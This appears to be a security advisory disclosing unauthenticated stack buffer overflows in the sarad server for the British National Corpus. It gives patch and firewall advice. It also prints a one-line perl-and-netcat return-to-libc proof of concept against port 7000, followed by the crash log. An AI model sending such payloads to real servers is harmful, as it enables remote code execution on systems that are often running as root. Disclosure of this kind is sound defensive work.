I have found several buffer overflows in the sarad program used to serve the British National Corpus (http://www.natcorp.ox.ac.uk/SARA/). At least one (I didn't check the others too closely) allows execution of arbitrary code over the network with the rights of the daemon which is supposed to be a dedicated low-rights account but I have seen to be root in places. No authentication is required to perform an attack, so the risk is quite high. The British National Corpus is used by many linguists for research on the English language and is licensed commercially by the BNC Consortium. The server software run on various flavors of Unix and is freely available in source form from http://www.natcorp.ox.ac.uk/SARA/ while the client is a Win32 program (apparently, the server can be compiled for Windows too, but I haven't checked this). The server implements its own access control system, therefore its port (7000 by default) is usually not protected by additional measures such as iptables rules. The bugs are classic examples of buffers on the stack that get copied into without bounds checking and thus allows overwriting the return address. The following perl snippet does a return-to-libc on Linux 2.6.7/glibc 2.3.2, logging some garbage by jumping into syslog(): perl -e 'print "SUCK" x 11; print chr foreach(0x90,0xdb,0x14,0x40,0);' \ | netcat victim 7000 The result: Aug 19 20:50:05 drgonzo sarad[2449]: Connect from huxley.lan Aug 19 20:50:05 drgonzo sarad[6519]: Client sent string SUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCK?Û@ Aug 19 20:50:05 drgonzo sarad[6519]: syslog: unknown facility/priority: 80e5540 Aug 19 20:50:05 drgonzo sarad[6519]:P^F Aug 19 20:50:05 drgonzo sarad[2449]: Forked process 6519 Aug 19 20:50:05 drgonzo sarad[2449]: Child pid=6519 was killed with signal 11 Possible solution: patch the source. I fixed the most glaring bugs, checking array bounds, using strncpy() and snprintf() instead of their unbounded counterparts, the usual stuff. Actually, even though the last program version is from 2001, most of the code dates back to the mid-90s and is a mess that dearly needs rewriting. So I'd suggest not to trust the builtin access control either, but restrict access to the port as much as possible using firewalls, iptables or similar measures. There are two patches available from my homepage: one that should be suitable for all systems and fixes the abovementioned bugs, and one that does the same and also lets sarad automatically chroot itself to the corpus directory and drops rights to a specified account. The latter will probaby not compile on Windows. So even if there are dangerous buffer overflows left in the code, which I think is almost certain, you will not open your entire system to an attacker. You can get the patches, including fairly simple installation instructions, from http://www.linguistik.uni-erlangen.de/~msbethke/binaries/sara-fix.tar.gz (signature: .../sara-fix.tar.gz.sig) cheers! Matthias
Attachment:
pgpcj1ho1k8aZ.pgp
Description: PGP signature